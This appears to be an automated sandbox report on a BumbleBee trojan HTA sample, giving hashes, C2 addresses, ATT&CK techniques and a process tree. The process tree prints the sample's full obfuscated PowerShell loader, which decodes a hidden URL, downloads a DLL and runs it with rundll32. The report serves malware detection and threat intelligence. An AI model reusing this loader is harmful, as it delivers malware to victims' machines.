bumblebee | 18810249d8c67ac8926613e773e1c5e40449be55c595116dce99bb35004de374

General

Target

18810249d8c67ac8926613e773e1c5e40449be55c595116dce99bb35004de374.hta
Size

96KB
MD5

24432d480bb9d709ab25209a630cb203
SHA1

42a30be9fb069c43ef06fb9acb47909d9dab8cef
SHA256

18810249d8c67ac8926613e773e1c5e40449be55c595116dce99bb35004de374
SHA512

be12606eec050d7c9073c9e36ddbb18b3d69a12dc5823a601b089729640abeeb5e6a7a2ac07131198c468ae96366ef95274409573ebf771a97678d30e049a04a
SSDEEP

1536:v9Q2Ca7Qr8FYoV+iUpQCe9WRhIHt/7YZ1f:v9QTa7Qr8FYc+iUkgYJUnf

Score

10^/10

bumblebee 1011t1 trojan

Malware Config

Extracted

Family

bumblebee

Botnet

1011t1

C2

64.44.135.140:443

103.144.139.150:443

146.70.149.43:443

rc4.plain

Signatures

BumbleBee
BumbleBee is a webshell malware written in C++.
trojan bumblebee

Blocklisted process makes network request 7 IoCs

flow	pid	Process
12	1096	powershell.exe
43	4576	rundll32.exe
44	4576	rundll32.exe
57	4576	rundll32.exe
66	4576	rundll32.exe
81	4576	rundll32.exe
93	4576	rundll32.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	mshta.exe

Loads dropped DLL 2 IoCs

pid	Process
5116	rundll32.exe
4576	rundll32.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
4576	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1096	powershell.exe
1096	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1096	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1912 wrote to memory of 1096	1912	mshta.exe	82
PID 1912 wrote to memory of 1096	1912	mshta.exe	82
PID 1912 wrote to memory of 1096	1912	mshta.exe	82
PID 1096 wrote to memory of 5116	1096	powershell.exe	84
PID 1096 wrote to memory of 5116	1096	powershell.exe	84
PID 1096 wrote to memory of 5116	1096	powershell.exe	84
PID 5116 wrote to memory of 4576	5116	rundll32.exe	85
PID 5116 wrote to memory of 4576	5116	rundll32.exe	85

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\18810249d8c67ac8926613e773e1c5e40449be55c595116dce99bb35004de374.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1912
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function MWG($Fii, $erX){[IO.File]::WriteAllBytes($Fii, $erX)};function LaM($Fii){if($Fii.EndsWith((HQD @(6236,6290,6298,6298))) -eq $True){rundll32.exe $Fii , mruAlloc }elseif($Fii.EndsWith((HQD @(6236,6302,6305,6239))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $Fii}elseif($Fii.EndsWith((HQD @(6236,6299,6305,6295))) -eq $True){misexec /qn /i $Fii}else{Start-Process $Fii}};function NRU($eMW){$QMX = New-Object (HQD @(6268,6291,6306,6236,6277,6291,6288,6257,6298,6295,6291,6300,6306));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$erX = $QMX.DownloadData($eMW);return $erX};function HQD($vfw){$ZTq=6190;$ViK=$Null;foreach($aFd in $vfw){$ViK+=[char]($aFd-$ZTq)};return $ViK};function Xxb(){$Bpm = $env:AppData + '\';;;$WbktydWSz = $Bpm + '1011t1_cr1.dll'; if (Test-Path -Path $WbktydWSz){LaM $WbktydWSz;}Else{ $jPzXrDoPH = NRU (HQD @(6294,6306,6306,6302,6305,6248,6237,6237,6289,6304,6307,6290,6305,6235,6289,6298,6307,6288,6236,6289,6301,6299,6237,6239,6238,6239,6239,6306,6239,6285,6289,6304,6239,6236,6290,6298,6298));MWG $WbktydWSz $jPzXrDoPH;LaM $WbktydWSz;};;}Xxb;
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1096
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\1011t1_cr1.dll mruAlloc
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:5116
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\1011t1_cr1.dll mruAlloc
      4⤵
      Blocklisted process makes network request
      Loads dropped DLL
      Suspicious use of NtCreateThreadExHideFromDebugger
      PID:4576

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\1011t1_cr1.dll

Filesize
830KB

MD5
19f8c4fb6b729f856173beba2b8cfc1d

SHA1
37faae961fa1ca194a2d29a5ac4958e91f0c4c9c

SHA256
ea96dbb2ffa8cd6ab05a31e55b6452a00784366bb6316dd787acb07e82cae9f9

SHA512
4e5d97f0d0c2f7b8384dffd922e8374c5ffc781b1cf0adf9c08a647982b2eba3c90f248014bbb2d50c8c56940fc06c737e6db388e3df08f5a781495b54e03308

Download Submit
C:\Users\Admin\AppData\Roaming\1011t1_cr1.dll

Filesize
830KB

MD5
19f8c4fb6b729f856173beba2b8cfc1d

SHA1
37faae961fa1ca194a2d29a5ac4958e91f0c4c9c

SHA256
ea96dbb2ffa8cd6ab05a31e55b6452a00784366bb6316dd787acb07e82cae9f9

SHA512
4e5d97f0d0c2f7b8384dffd922e8374c5ffc781b1cf0adf9c08a647982b2eba3c90f248014bbb2d50c8c56940fc06c737e6db388e3df08f5a781495b54e03308

Download Submit
C:\Users\Admin\AppData\Roaming\1011t1_cr1.dll

Filesize
830KB

MD5
19f8c4fb6b729f856173beba2b8cfc1d

SHA1
37faae961fa1ca194a2d29a5ac4958e91f0c4c9c

SHA256
ea96dbb2ffa8cd6ab05a31e55b6452a00784366bb6316dd787acb07e82cae9f9

SHA512
4e5d97f0d0c2f7b8384dffd922e8374c5ffc781b1cf0adf9c08a647982b2eba3c90f248014bbb2d50c8c56940fc06c737e6db388e3df08f5a781495b54e03308

Download Submit
memory/1096-140-0x0000000006E00000-0x0000000006E1A000-memory.dmp

Filesize
104KB

Download
memory/1096-142-0x0000000007F00000-0x00000000084A4000-memory.dmp

Filesize
5.6MB

Download
memory/1096-137-0x00000000062C0000-0x0000000006326000-memory.dmp

Filesize
408KB

Download
memory/1096-138-0x00000000068E0000-0x00000000068FE000-memory.dmp

Filesize
120KB

Download
memory/1096-139-0x00000000078B0000-0x0000000007946000-memory.dmp

Filesize
600KB

Download
memory/1096-141-0x0000000006E70000-0x0000000006E92000-memory.dmp

Filesize
136KB

Download
memory/1096-136-0x00000000061A0000-0x0000000006206000-memory.dmp

Filesize
408KB

Download
memory/1096-143-0x0000000008B30000-0x00000000091AA000-memory.dmp

Filesize
6.5MB

Download
memory/1096-133-0x0000000005300000-0x0000000005336000-memory.dmp

Filesize
216KB

Download
memory/1096-135-0x0000000005A30000-0x0000000005A52000-memory.dmp

Filesize
136KB

Download
memory/1096-134-0x0000000005A80000-0x00000000060A8000-memory.dmp

Filesize
6.2MB

Download
memory/4576-149-0x000001FFB2040000-0x000001FFB2189000-memory.dmp

Filesize
1.3MB

Download
memory/4576-150-0x000001FFB04E0000-0x000001FFB0553000-memory.dmp

Filesize
460KB

Download

Analysis

Sharing